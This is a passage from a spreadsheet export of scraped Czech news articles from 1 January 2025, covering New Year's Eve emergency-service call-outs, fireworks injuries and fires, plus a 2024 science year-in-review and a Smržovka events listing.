    <t>Silvestrovská noc záchranářů. V Budějovicích muž v potoce, v Prachaticích mladistvý opilec skončil v nemocnici. Ke zranění pyrotechnikou došlo na Lipně 1.1.2025 10:08 JIŽNÍ ČECHY - Silvestrovské služby tradičně patří mezi ty nejrušnější z celého roku a ani ta letošní nebyla výjimkou. Přes den od 6 do 18 hodin vyjížděly posádky Zdravotnické záchranné služby ke 154 případům, což je mírně nad celoročním denním průměrem. Jednalo se především o starší pacienty se zhoršením interních onemocnění jako jsou dušnosti, horečnaté stavy a onemocnění oběhové soustavy. Noc pak byla podle očekávání rušnější. Informuje o ní mluvčí jihočeské zdravotnické záchranné služby Petra Kafková: Na noční směnu bylo Zdravotnické operační středisko posíleno o jednoho operátora. Výjezdová činnost byla zajištěna ve stejném rozsahu jako v ostatních dnech v roce 53 výjezdovými skupinami na 33 základnách v celém Jihočeském kraji. Během silvestrovské noci řešila Zdravotnická záchranná služba 121 událostí, což je 70% zvýšení oproti průměrnému počtu výjezdů při běžných nočních směnách. Indikace výjezdů byli klasické. V 19 případech se jednalo o úrazy pod vlivem alkoholu a intoxikace alkoholem , dalších 6 osob se zranilo při vzájemných potyčkách. • Českobudějovičtí záchranáři společně s hasiči ve 21 hodin vyjížděli na pomoc muži, který pod vlivem alkoholu spadl do potoka a nebyl schopen se vlastními silami z vody dostat. Ve vodě strávil minimálně dvacet minut a byl podchlazený. Po ošetření na místě a zajištění tepelného komfortu jej zdravotníci předali do péče kolegům z urgentního příjmu českobudějovické nemocnice. • Prachatičtí záchranáři ošetřili třicet minut po půlnoci ošetřili jednu mladistvou osobu intoxikovanou alkoholem . Po poskytnutí přednemocniční neodkladné péče byla předána do péče dětského oddělení prachatické nemocnice. • Českokrumlovští záchranáři zasahovali krátce před 23. hodinou u úrazu způsobeného pyrotechnikou. Událost se stala na Lipně . Muži při odpalování explodovala pyrotechnika v ruce zranila ho v oblasti dlaně a prstů ruky. Jednalo se i jediné zranění zábavní pyrotechnikou, které naši záchranáři letos na Silvestra ošetřili. • Všechna lůžka na protialkoholní záchytné stanici v Českých Budějovicích byla zaplněna již třicet minut po půlnoci. V průběhu posledního dne v roce zasahovaly posádky záchranářů také u devíti dopravních nehod. Ve 22.53 byl na Zdravotnické operační středisko nahlášen střet tří osobních vozidel u Studánek na Českokrumlovsku. K události okamžitě vyjely tři pozemní posádky z Vyššího Brodu a Českého Krumlova a vrtulník Letecké záchranné služby. Záchranáři na místě ošetřili tři zraněné. Muže středního věku, který při nehodě utrpěl těžké zranění v oblasti hlavy a pánve. Záchranáři ho zajistili žilní linkou, podali potřebné léky a imobilizovali krčním límcem, pánevním fixátorem a uložením do celotělové vakuové matrace. Letečtí záchranáři zraněného transportovali na traumacentrum českobudějovické nemocnice. Sem byla po poskytnutí obdobné péče transportována i těžce zraněná sedmapadesátiletá žena, s podezřením na poranění v oblasti hrudníku, břicha a pánve. Třetí zraněná, žena středního věku, utrpěla středně závažné poranění horní končetiny a hrudníku. Po poskytnutí přednemocniční neodkladné péče ji záchranáři předali do českokrumlovské nemocnice. Autor: Libuše Kolářová Autor: Libuše Kolářová Autor person Libuše Kolářová</t>
  </si>
  <si>
    <t>20250101_245_3695117351_148d4017265c526a0466.html</t>
  </si>
  <si>
    <t>148d4017265c526a0466</t>
  </si>
  <si>
    <t>Rok začal amputacemi i stovkami požárů. Záchranáři měli pernou noc</t>
  </si>
  <si>
    <t>Rok začal amputacemi i stovkami požárů. Záchranáři měli pernou noc Zdravotničtí záchranáři měli na silvestra rušnější noc než před rokem. Kvůli zranění pyrotechnikou ošetřili v Praze 27 lidí, jeden po těžkém úrazu hlavy skončil v traumacentru. V Ústeckém kraji řešili záchranáři několik amputací rukou nebo článků prstů způsobené pyrotechnikou. Hasiči zasahovali u 355 požárů, častým důvodem byla zábavní pyrotechnika. Policie při silvestrovských oslavách nezaznamenala žádnou mimořádnou událost, přesto ale řešila mnohem více konfliktních případů než v běžný den. „Především šlo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí,“ uvedli policisté na sociální síti X. V celém Česku vyjeli k 3 250 případům, což se podle jejich informací neliší od běžného pracovního dne. „Ze strany použití pyrotechniky hodnotíme letošní Silvestr jako jeden z nejklidnějších, nicméně od půlnoci se pražští policisté na tísňové lince, ale i po celé Praze prakticky nezastavili a stejně jako v loňském roce řešili bezmála tisíc oznámení,“ uvedla v prohlášení mluvčí pražské policie Eva Kropáčová. Zdravotničtí záchranáři v Praze měli na silvestra rušnější noc než před rokem. Vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka. Zranění zábavní pyrotechnikou bylo devět, řekl‚ mluvčí zdravotnické záchranné služby Karel Kirs. Policie ČR @PolicieCZ 1/2 Za včerejší den a noc jsme sice nezaznamenali žádnou mimořádnou událost, ale i přesto jsme řešili mnohem více konfliktních případů než v běžný den. Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí. https://t.co/N7sqS4Y15w 1. ledna 2025 v 8:50, příspěvek archivován: 1. ledna 2025 v 9:04 „Ve speciálu Golem jsme ošetřili 27 pacientů, z nichž 13 jsme převezli do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ uvedl Kirs na sociální síti X. Pyrotechnika o letošní silvestrovské noci v Ústeckém kraji způsobila několik amputací, ať už ruky, nebo článků prstů. Záchranáři vyjížděli k desítkám případů. Zranění zábavní pyrotechnikou si vyžádalo jejich zásah desetkrát, další události se týkaly výjezdů k lidem, kteří požili přemíru alkoholu nebo se v důsledku jeho požití poranili. Záchranáři pomáhali také u událostí, které se oslav příchodu nového roku netýkaly. „Jednalo se tak tradičně o jednu z nejnáročnějších služeb roku,“ uvedl mluvčí záchranářů Prokop Voleník. Hasičský záchranný sbor ČR @hasici_cr Služba na přelomu starého a nového roku patří k těm náročnějším, a ani včerejší noc nebyla výjimkou: https://t.co/g7hp2KpoZk 1. ledna 2025 v 11:05, příspěvek archivován: 1. ledna 2025 v 11:48 Dva pacienti utrpěli vážné poranění zábavní pyrotechnikou, jedno bylo dokonce velmi závažné. „Pacienta jsme museli převést do ústeckého traumacentra a uvést ho do umělého spánku. Měl opravdu devastující poranění způsobené zábavní pyrotechnikou,“ popsal Voleník nejvážnější výjezd během letošních oslav příchodu nového roku. Mladík z Mostecka si ponese následky po celý život. Mluvčí policie Ilona Gazdošová k případu řekla, že muži vážné poranění způsobila pyrotechnika, kterou našel na ulici. „Utrhlo mu to prsty a část dlaně,“ uvedla mluvčí. Dalším pacientům pyrotechnika trhala články prstů, způsobila jim tržné rány a popáleniny. Jednalo se však o středně vážná či lehká zranění, uvedl Voleník. Záchranáři také vyjeli ke 40 lidem, kteří požili alkohol v takové míře, že bylo zapotřebí je převézt do nemocnice. „Pak jsou to další desítky zranění spojených právě s požitím alkoholu ,“ doplnil mluvčí. Na silvestra v Libereckém kraji se záchranáři až do středečního rána nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po šesté ráno na Nový rok mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. „Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem ,“ řekl Georgiev. Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Hasiči řešili stovky požárů po celé ČR Příchod Nového roku byl opět spojen se zvýšeným počtem požárů. Největší nárůst událostí hasiči zaznamenali v prvních dvou hodinách po půlnoci, kdy vyjeli k více než dvěma stům požárům, jejichž příčinou byla mimo jiné také zábavní pyrotechnika. Nejčastěji se jednalo o požáry odpadkových košů, kontejnerů, nebo zbytků z pyrotechniky, které byly zapáleny při nočních oslavách. Velmi často hořely i porosty, zejména keře, trávy či živé ploty, jejichž příčinou byla rovněž pyrotechnika. Během silvestrovských oslav hasiči zasahovali u 355 požárů. Celkem jich však bylo 357. Dva se obešly bez účasti hasičů. Nejvíce práce měli hasiči v Moravskoslezském kraji . Zasahovat museli do 6. hodiny ranní u celkem 63 požárů. Z toho 16 událostí bylo způsobeno použitím zábavní pyrotechniky. Ve Středočeském kraji pak hasiče zaměstnalo 51 požárů a z toho 47 z nich bylo způsobeno použitím zábavní pyrotechniky. Hasiči vyjížděli na jižní Moravě o silvestrovské noci mezi 20:00 a 01:00 ke 40 událostem, z toho v 29 případech k požárům. Povětšinou šlo o odpadkové koše a kontejnery. V jednom případě také hořelo dříví v kotelně kláštera dominikánek ve Střelicích na Brněnsku, který slouží jako domov pro zdravotně postižené. Z objektu se muselo evakuovat 55 lidí, ale po ukončení zásahu se mohli vrátit a nikdo se nezranil. Policisté také v noci zadrželi ženu z Břeclavska, která je podezřelá z loupeže. „Napadla svého známého a odcizila mu peněženku,“ uvedl mluvčí Pavel Šváb. Napadený skončil zraněný v nemocnici. Na policejní služebnu nedobrovolně putoval i mladý muž, který krátce po půlnoci ohrožoval na Moravském náměstí v Brně kolemjdoucí nožem. Z pohledu brněnských strážníků se jednalo o jednu z nejpoklidnějších silvestrovských nocí za poslední roky z hlediska počtu oznámení i vážnosti případů. Většinou asistovali u rozmíšek způsobených alkoholem , oznámení o zatoulaných psech se nevymykala průměru, uvedl na webu strážníků Jakub Ghanem. Autor: ČTK Autor ČTK Rubrika transition_slide Události - Česko</t>
  </si>
  <si>
    <t>102690</t>
  </si>
  <si>
    <t>20250101_246_3695123576_59effc688658bbaeed37.html</t>
  </si>
  <si>
    <t>59effc688658bbaeed37</t>
  </si>
  <si>
    <t>V roce 2024 jsme pocítili sílu Slunce i změnili léčbu obezity</t>
  </si>
  <si>
    <t>V roce 2024 jsme pocítili sílu Slunce i změnili léčbu obezity 01. ledna 2025 nový objev, objev, Rozhovor, science, Technika, týden ve vědě, věda, vědecké objevy Zemička opět udělala další orbitu kolem našeho Sluníčka – a znovu se tak potkáváme u soupisu toho nej, co podle nás věda dala lidstvu, nebo alespoň zjistila o světu kolem nás! Pojedeme od octomilčích neuronů přes testování superraket až po mocnou sílu boha Ra! Již brzy si také vše spolu s dalšími popularizátory rozebereme v tradičním streamu Rok ve vědě – pravděpodobně v pondělí 6. ledna kolem 18:00. Byly to ty nejlepší z časů, byly to ty nejhorší z časů… Zdroj: CC BY, Apple , vlastní Dokončena mapa mozkového konektomu dospělé octomilky. Obsahuje přibližně 140 000 neuronů propojených 50 miliony nervových spojení. Lidský mozek je však asi dvamilionkrát složitější. Přesto jde o pozoruhodný pokrok – předešlý podobná mapa měla jen 3000 neuronů a ještě před tím sotva stovky. Lze tedy očekávat, že postupně (a nikoliv zázračně) se rychlost i díky strojovému učení bude zvyšovat… Starship při svém čtvrtém i pátém letu poprvé přežila až do přistání. Pokusné lety systému Super Heavy – Starship v roce 2024 přestaly být pastvou pro oči pro milovníky výbuchů! Poslední testovací let lodi SpaceX Starship odstartoval v listopadu 2024 a znamenal významný krok k vytvoření plně znovupoužitelného nosného systému pro mise na Měsíc a Mars. Především letos Starship ukázal působivý moment, když SpaceX úspěšně zachytila nosnou raketu Super Heavy pomocí masivních ramen na své startovací věži Mechazilla. Navíc i Starship sám měkce „přistál“ ve vlnách Indického oceánu! Zároveň je ale rok 2024 i tím rokem, kdy Starship již měl dle původních plánů letět s lidmi na Mars . Anebo alespoň s lidmi přistávat na Měsíci. Což se evidentně neděje. Nové léky mění léčbu obezity. Ozempic, ozempic, ozempic! Po dekádách čekání mění nové objevy v biochemii náhled na léky pro hubnutí. Jakkoliv jsou nová řešení nedokonalá, globální epidemie obezity nepůsobí jako lepší alternativa… Ozempic a další léky s GLP-1, jako jsou Wegovy a Mounjaro, jsou účinné při léčbě obezity a metabolických onemocnění, protože snižují hladinu cukru v krvi, omezují chuť k jídlu a snižují zánět. Slibně se projevují i při zlepšování zdraví srdce a mozku a brzy se mohou zaměřit na onemocnění, jako je Alzheimerova choroba. Testují se nové léky, jako je tirzepatid, které mají ještě širší účinky zaměřené na hormony, ale jejich dostupnost je omezená, protože pojišťovny často léčbu obezity vylučují. Alespoň prozatím! Džoserova pyramida mohla být postavena hydraulickým výtahem. Dvojice šachet v nejstarší pyramidě v Sakkáře mohla být součástí systému jednoduchého, leč efektivního výtahu využívajícího vodu. Idea je, že by bloky pyramid mohly být šachtou nadnášeny plováky na místo určení – naznačuje to objev a popis podzemní šachty, včetně jejího napojení na zdroje vody, která k takovému plovákovému výtahu mohla sloužit. Idea toho, jak se budovaly slavné stavby, je tak stále vyvíjí! Monumentální sluneční erupce, největší za posledních téměř 20 let, mi nula Zemi. Slunce na jaře uvolnilo vůbec největší erupci od roku 2005 – není to tak šokantní, jelikož jsme na vrcholu slunečního cyklu. Přesto dokázala vykouzlit fascinující polární záře i nad Českem ! Pokud nás nezasáhne výron sluneční plasmy, který by usmažil počítače, užívejte, dokud můžete – v roce 2025 by maximum tohoto cyklu mělo skončit. FPV drony jsou jednou z největších inovací ukrajinské války. Jsou malé a šikovné – alespoň co se týče schopnosti naletět ve vysoké rychlosti, k nějakému cíli, a odpálit nárazem do cíle hlavici, buď kumulativní (obvykle z RPG-7) proti vozidlům, tříštivou nebo i termobarickou proti vojákům v okopech. FPV (first-person view) drony, vytvořené původně z civilních závodních dronů a ovládané lidmi s nasazenými VR helmami, platí díky svému rozšíření na obou stranách invaze na Ukrajinu za jednu z největších zdejších válečných inovací – a ukazují jednu z podob konfliktů budoucnosti… Vytvořen nanorobot z DNA schopný chytat viry do nanorukou. Nanorobot byl „upleten“ z jediného vlákna DNA, přičemž na konečcích jeho „prstů“ jsou struktury schopné zachytit konkrétní virové částice. Schopnost zatím prokázal na virech, které způsobují covid. Když se mluví o DNA, obvykle se jedním metaforickým dechem míní genetická informace, kterou DNA v našich/vašich buňkách obsahuje. V tomto kontextu je DNA něco jako kniha – kuchařka různých receptů na proteiny, z níž je pak vaří buňky. Jenže stejně jako knihu můžete použít třeba i jako zarážku na dveře nebo podklad pod křivý stůl, také molekuly DNA mohou mít podstatně jednodušší využití. V loňském roce byla naplánována a vypuštěna družice českých středoškoláků – LASARsat! Návrh a stavba cubesatu proběhla v průběhu roku, aby byla 21. prosince 2024 zakončena vypuštěním v rámci mise Bandwagon-2 společnosti SpaceX , která vynesla i řadu jiných satelitů. Půjde vše dopadne dobře, na orbitě bude testovat zejména laserové ovlivňování i laserové deorbitování družic. Zatím je trochu brzy na další hodnocení mise, satelit se teprve rozkoukává – rozhodně bude ale zajímavé sledovat jak další vývoj družice samotné, tak i jejích stavitelů… Bottom Úprava úhlu listů pomocí CRISPRu zlepšuje výnos cukrové třtiny. Postupnou úpravou kopií genu pro úhel listů rostliny se podařilo zvýšit množství přijatého slunečního záření – a tak o desítky procent zvýšit i výnosy plodiny. Magnetické pole Slunce může vznikat blízko jeho povrchu. Sluneční skvrny a sluneční erupce by mohly být generovány pohyby hmoty ve vnějších částech Slunce. Může to napomoci lépe předpovídat vesmírné počasí. Léčivo lenacapavir prokázalo v klinických studiích 96% až 100% úspěšnost v prevenci HIV. Oproti existujícím antivirotikům braným denně se nový lék podává dvakrát ročně ve formě podkožní injekce. ChatGPT umí lidi přesvědčovat lépe než jiní lidi. Preprint studie naznačuje, že i dnešní strojová učení by mohla efektivněji měnit naše názory. GPT-4 byla navíc mnohem efektivněji po přístupu k osobním údajům přesvědčovaných. Oteplení o 1,5 °C jsme překročili v roce 2023. A možná i o dekádu dřív! Analýza mořských hub z 19. století, z jejichž kostí lze vyčíst informace o lokální teplotě, naznačuje počátek oteplování ještě před období, kdy začala přesná měření. Také minimálně za posledních 12 měsíců trvale překračovalo 1,5 stupně Celsia oproti předindustriální úrovni. Oznámila to meteorologická služba Copernicus . Skála na Marsu může (a nemusí) skrývat dávný život. Rover na Marsu identifikoval sedimentární horninu, která vykazuje geologické známky možné přítomnosti dávných mikrobů. V oceánu vzniká „temný kyslík“, může přepsat vznik života. K produkci kyslíku není třeba sluneční svit – dokazuje to objev přirozeného kyslíkového producenta 4 000 metrů pod hladinou moře. Genová terapie navrací sluch dětem s genetickou hluchotou. Inovativní genová terapie rozdělila příliš velký „opravený“ gen a úspěšně jeho vložením do dětí s nemocí OTOF výrazně vylepšila jejich sluch. Bonusy V minulém roce se nám vcelku dařilo držet tempo „1 rozhovoru a/nebo návštěvy na vědátorském pracovišti týdně“, celý soupis těchto videí najdete tradičně v playlistu Vědátoři na pivu (to jsou rozhovory) či Vědátoři v robotě (to jsou ty návštěvy). Zároveň jsme obnovili i natáčení v poli, nejen skrze streamy. Vloni jsme taky resetovali náš web, který můžete vidět kolem sebe. Spolu s tím šel i reset merche (via Hadron Store ), ale i možnost publikovat vaše texty u mě, popřípadě vydávat spolu se mnou vaše spolupracující příspěvky (viz hír ). Bylo toho zkrátka dost a možná až příliš! [red] Vědátor vznikl jako spinoff spolku studentů a popularizátorů vědy UP Crowd, dnes jej provozuje spolek Hyperion Media. Krom různých autorů projekt jako šéfredaktor vede Ladislav Loukota – kontaktní mail je [email protected] Mohlo by vás dále zajímat: Dvoutýden ve vědě 23. prosince 2024 až 5. ledna 2025 05. ledna 2025 Vítejte v prvním týdnu tohoto zcela jistě skvělého &amp;amp; revolučními změnami nabitého roku (byť bych si spíše přál jeden zcela… Robokoule &amp;amp; DružiCZe – Týden ve vědě 16. až 22.… 22. prosince 2024 Poslední týden ve vědě je tu! Zřejmě již za týden si dáme tradiční ROK VE VĚDĚ, dnes se však ještě… Spalničky &amp;amp; Šimpanzi – Týden ve vědě 9. až 15.… 15. prosince 2024 To nejlepší nakonec – v tomto duchu se nese opožděný, ale o to famóznější Týden ve vědě! Posvítíme si na… Kosatklobouky &amp;amp; HPVakcína – Týden ve vědě 2. až… 08. prosince 2024 Turbulentní týden je u konce, prolouskejte si novinky v lidském poznání! Máme tu módu u kosatek, evoluci mozku, historii Venuše… Reklama Autor: loukota Rubrika transition_slide Týden ve vědě</t>
  </si>
  <si>
    <t>1340</t>
  </si>
  <si>
    <t>20250101_247_3695075473_a1d600dc13d6f9a4395b.html</t>
  </si>
  <si>
    <t>a1d600dc13d6f9a4395b</t>
  </si>
  <si>
    <t>Rok začal amputacemi i stovkami požárů. Záchranáři měli pernou noc Zdravotničtí záchranáři měli na silvestra rušnější noc než před rokem. Kvůli zranění pyrotechnikou ošetřili v Praze 27 lidí, jeden po těžkém úrazu hlavy skončil v traumacentru. V Ústeckém kraji řešili záchranáři několik amputací rukou nebo článků prstů způsobené pyrotechnikou. Hasiči zasahovali u 355 požárů, častým důvodem byla zábavní pyrotechnika. Policie při silvestrovských oslavách nezaznamenala žádnou mimořádnou událost, přesto ale řešila mnohem více konfliktních případů než v běžný den. „Především šlo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí,“ uvedli policisté na sociální síti X. V celém Česku vyjeli k 3 250 případům, což se podle jejich informací neliší od běžného pracovního dne. „Ze strany použití pyrotechniky hodnotíme letošní Silvestr jako jeden z nejklidnějších, nicméně od půlnoci se pražští policisté na tísňové lince, ale i po celé Praze prakticky nezastavili a stejně jako v loňském roce řešili bezmála tisíc oznámení,“ uvedla v prohlášení mluvčí pražské policie Eva Kropáčová. Zdravotničtí záchranáři v Praze měli na silvestra rušnější noc než před rokem. Vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka. Zranění zábavní pyrotechnikou bylo devět, řekl‚ mluvčí zdravotnické záchranné služby Karel Kirs. Policie ČR @PolicieCZ 1/2 Za včerejší den a noc jsme sice nezaznamenali žádnou mimořádnou událost, ale i přesto jsme řešili mnohem více konfliktních případů než v běžný den. Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí. https://t.co/N7sqS4Y15w 1. ledna 2025 v 8:50, příspěvek archivován: 1. ledna 2025 v 9:04 oblíbit retweet odpovědět „Ve speciálu Golem jsme ošetřili 27 pacientů, z nichž 13 jsme převezli do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ uvedl Kirs na sociální síti X. Pyrotechnika o letošní silvestrovské noci v Ústeckém kraji způsobila několik amputací, ať už ruky, nebo článků prstů. Záchranáři vyjížděli k desítkám případů. Zranění zábavní pyrotechnikou si vyžádalo jejich zásah desetkrát, další události se týkaly výjezdů k lidem, kteří požili přemíru alkoholu nebo se v důsledku jeho požití poranili. Záchranáři pomáhali také u událostí, které se oslav příchodu nového roku netýkaly. „Jednalo se tak tradičně o jednu z nejnáročnějších služeb roku,“ uvedl mluvčí záchranářů Prokop Voleník. Hasičský záchranný sbor ČR @hasici_cr Služba na přelomu starého a nového roku patří k těm náročnějším, a ani včerejší noc nebyla výjimkou: https://t.co/g7hp2KpoZk 1. ledna 2025 v 11:05, příspěvek archivován: 1. ledna 2025 v 11:48 oblíbit retweet odpovědět Dva pacienti utrpěli vážné poranění zábavní pyrotechnikou, jedno bylo dokonce velmi závažné. „Pacienta jsme museli převést do ústeckého traumacentra a uvést ho do umělého spánku. Měl opravdu devastující poranění způsobené zábavní pyrotechnikou,“ popsal Voleník nejvážnější výjezd během letošních oslav příchodu nového roku. Mladík z Mostecka si ponese následky po celý život. Mluvčí policie Ilona Gazdošová k případu řekla, že muži vážné poranění způsobila pyrotechnika, kterou našel na ulici. „Utrhlo mu to prsty a část dlaně,“ uvedla mluvčí. Dalším pacientům pyrotechnika trhala články prstů, způsobila jim tržné rány a popáleniny. Jednalo se však o středně vážná či lehká zranění, uvedl Voleník. Záchranáři také vyjeli ke 40 lidem, kteří požili alkohol v takové míře, že bylo zapotřebí je převézt do nemocnice. „Pak jsou to další desítky zranění spojených právě s požitím alkoholu ,“ doplnil mluvčí. Na silvestra v Libereckém kraji se záchranáři až do středečního rána nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po šesté ráno na Nový rok mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. „Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem ,“ řekl Georgiev. Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Hasiči řešili stovky požárů po celé ČR Příchod Nového roku byl opět spojen se zvýšeným počtem požárů. Největší nárůst událostí hasiči zaznamenali v prvních dvou hodinách po půlnoci, kdy vyjeli k více než dvěma stům požárům, jejichž příčinou byla mimo jiné také zábavní pyrotechnika. Nejčastěji se jednalo o požáry odpadkových košů, kontejnerů, nebo zbytků z pyrotechniky, které byly zapáleny při nočních oslavách. Velmi často hořely i porosty, zejména keře, trávy či živé ploty, jejichž příčinou byla rovněž pyrotechnika. Během silvestrovských oslav hasiči zasahovali u 355 požárů. Celkem jich však bylo 357. Dva se obešly bez účasti hasičů. Nejvíce práce měli hasiči v Moravskoslezském kraji . Zasahovat museli do 6. hodiny ranní u celkem 63 požárů. Z toho 16 událostí bylo způsobeno použitím zábavní pyrotechniky. Ve Středočeském kraji pak hasiče zaměstnalo 51 požárů a z toho 47 z nich bylo způsobeno použitím zábavní pyrotechniky. Hasiči vyjížděli na jižní Moravě o silvestrovské noci mezi 20:00 a 01:00 ke 40 událostem, z toho v 29 případech k požárům. Povětšinou šlo o odpadkové koše a kontejnery. V jednom případě také hořelo dříví v kotelně kláštera dominikánek ve Střelicích na Brněnsku, který slouží jako domov pro zdravotně postižené. Z objektu se muselo evakuovat 55 lidí, ale po ukončení zásahu se mohli vrátit a nikdo se nezranil. Policisté také v noci zadrželi ženu z Břeclavska, která je podezřelá z loupeže. „Napadla svého známého a odcizila mu peněženku,“ uvedl mluvčí Pavel Šváb. Napadený skončil zraněný v nemocnici. Na policejní služebnu nedobrovolně putoval i mladý muž, který krátce po půlnoci ohrožoval na Moravském náměstí v Brně kolemjdoucí nožem. Z pohledu brněnských strážníků se jednalo o jednu z nejpoklidnějších silvestrovských nocí za poslední roky z hlediska počtu oznámení i vážnosti případů. Většinou asistovali u rozmíšek způsobených alkoholem , oznámení o zatoulaných psech se nevymykala průměru, uvedl na webu strážníků Jakub Ghanem. Lidé na Staroměstském náměstí v Praze slaví konec roku. (31. prosince 2024) Autor: Petr Topič, MAFRA Lidé v centru Prahy slaví příchod roku 2025. (1. ledna 2025) Autor: Petr Topič, MAFRA Během silvestrovských oslav vyjeli hasiči napříč celou republikou k více jak 300 požárům. Takto zasahovali ve Středočeském kraji . (1. ledna 2025) Autor: HZS Středočeského kraje Během silvestrovských oslav vyjeli hasiči napříč celou republikou k více jak 300 požárům. Takto zasahovali v Libereckém kraji. (1. ledna 2025) Autor: HZS Libereckého kraje Během silvestrovských oslav vyjeli hasiči napříč celou republikou k více jak 300 požárům. Takto zasahovali v Moravskoslezském kraji . (1. ledna 2025) Autor: HZS Moravskoslezského kraje Centrem novoročních oslav byla tradičně Praha . Nejvíce lidí slavilo na Staroměstském náměstí . (1. ledna 2025) Autor: Petr Topič, MAFRA Centrem silvestrovských oslav je Staroměstské náměstí v Praze. (31. prosince 2024) Autor: Petr Topič, MAFRA Zbytky pyrotechniky použité během novoročních oslav v Berlíně (1. ledna 2025) Autor: ČTK Česko vstoupilo do roku 2025. V Praze oslavovalo nejvíce lidí na Staroměstském náměstí Silvestr hlídají tisíce policistů. V centru Prahy je zatím klid Autor: ČTK Autor ČTK Rubrika transition_slide Zprávy - Domácí</t>
  </si>
  <si>
    <t>20250101_248_3695075792_16f40ba753d2e35ea925.html</t>
  </si>
  <si>
    <t>16f40ba753d2e35ea925</t>
  </si>
  <si>
    <t>Smržovské kulturní a zábavné akce v lednu</t>
  </si>
  <si>
    <t>Smržovské kulturní a zábavné akce v lednu 01.01.2025 10:01:39 | Autor: Paulina Havlasová | Rubrika: Kultura | Obce: Smržovka Přinášíme vám přehled akcí kulturního střediska a dalších organizací a spolků ve Smržovce a okolí v lednu 2025. Tři králové u ovečkového betléma Od 16.30 hodin na rozhraní ulic Občanská a Vřesová ve Střední Smržovce. Zhasnutí betlému a vyprovození Tří králů na jejich cestu. Nebude chybět: klasická nabídka nápojů pro zahřátí - svařené víno , betlémáček - alko i nealko, grog, čaj, opékání buřtů. Aktuální informace najdete na webových stránkách Spolku Malé Polsko : www.malepolsko-cz.webnode.cz, na https://facebook.com/malepolsko nebo telefonním čísle: 724 646 656. Jambo, Keňo! Výstava fotografií Petra Morávka ve výstavní síni Zámečku, kterou zahájí vernisáž v pátek 6. prosince od 18 hodin. „Už od mládí mi fotografování a cestování přináší radost. Kdo mě zná, ví, že při této zálibě fotím nejraději přírodu, tak jak ji vidím a vnímám já. Fotografování mi dává smysl objevovat nové věci a tvořit něco trvalého. Kdyby nebylo dlouholetého přání mojí ženy vycestovat do Keni , nevznikly by moje fotografické úlovky, které jsme společně s kamarády prožili v této zemi. Když naši přátelé projevili zájem dozvědět se příběhy z cesty, přijal jsem výzvu uspořádat výstavu a podělit se o zážitky. Prostřednictvím fotografií mohu ukázat rozmanitou přírodu Afriky , divoká zvířata ve volné přírodě, východ slunce v savaně a hlavně něco, co na jiném místě světa nelze zažít. Každá fotografie má svůj příběh (říká moje žena). Přijďte si je tedy prohlédnout od 6. prosince do Zámečku. Těším si i na osobní setkání v pátek 6. prosince od 18 hodin, kdy se můžete dozvědět, jak každý snímek vznikal. Přeji krásný obohacující zážitek." Petr Morávek. Výstavu můžete zhlédnout během týdne od 8 hodin, v pondělí a středu do 16 hodin, v úterý a čtvrtek do 15 hodin, v pátek do 11.30 hodin (polední přestávka: po-pá 11.30-12.30 hodin) - před plánovanou návštěvou vám doporučujeme si telefonicky ověřit, zda jsme přítomny (tel.: 483 369 325, 727 806 195), o víkendu pouze v sobotu od 13 do 16 hodin. Ve dnech 18. prosince 2024-5. ledna 2025 bude budova Zámečku uzavřena z důvodu čerpání řádné dovolené. Samostatná pozvánka Rockový ples (Ex)trémistů Od 19.30 hodin v sále Parkhotelu. Zveme vás na 25 + 2. ročník tradičního plesu. Lístky jsou k dostání v Makak aréně, v SUNDISK - Podhorská 93 nebo inviduálně na telefonních číslech 724 173 136, 775 580 381. Autobus z Jablonce tam i zpět zajištěn. Těšit se můžete na údernou tombolu a legendární dražbu. Vystoupí: Kohoutí stopa, Vanua2, Maršál Bazén a hosté. Myslivecký ples Od 20 hodin v sále Parkhotelu. Bohatá tombola, Myslivecká kuchyně. K tanci a poslechu hraje Bohemia Universal Band. Vstupenky lze zakoupit u pana Hartmana - tel. č.: 603 272 832. Vstupné: 300 Kč 15. obnovený všesportovní ples Plesová sezona klepe na dveře. A jako každoročně přicházíme s pozvánkou na Obnovený všesportovní ples ve Smržovce, společenskou událost roku. Již popatnácté! Dovolíme si připomenout loňský, 14. ročník, na Parkhotelu - brilantní předtančení smržovských cheeleadres a dechberoucí vystoupení pěveckého souboru Smržováček, doplněného o chlapce z ČKD a v neposlední řadě spokojení návštěvníci - to vše přispělo k úspěchu minulého plesu. Co připomínat nemusíme je, že tato společenská akce první kategorie je pořádána ve prospěch smržovské sportující mládeže. Díky vaší hojné účasti a mimořádné štědrosti našich sponzorů rozdělili pořadatelé jednotlivým oddílům mládeže částku 70 000 Kč. Za všechny ročníky Obnoveného všesportovního plesu ve Smržovce doputovalo sportujícím Smržováčkům již více než 750 000 Kč (to je třičtvrtě milionu veselý smajlík). 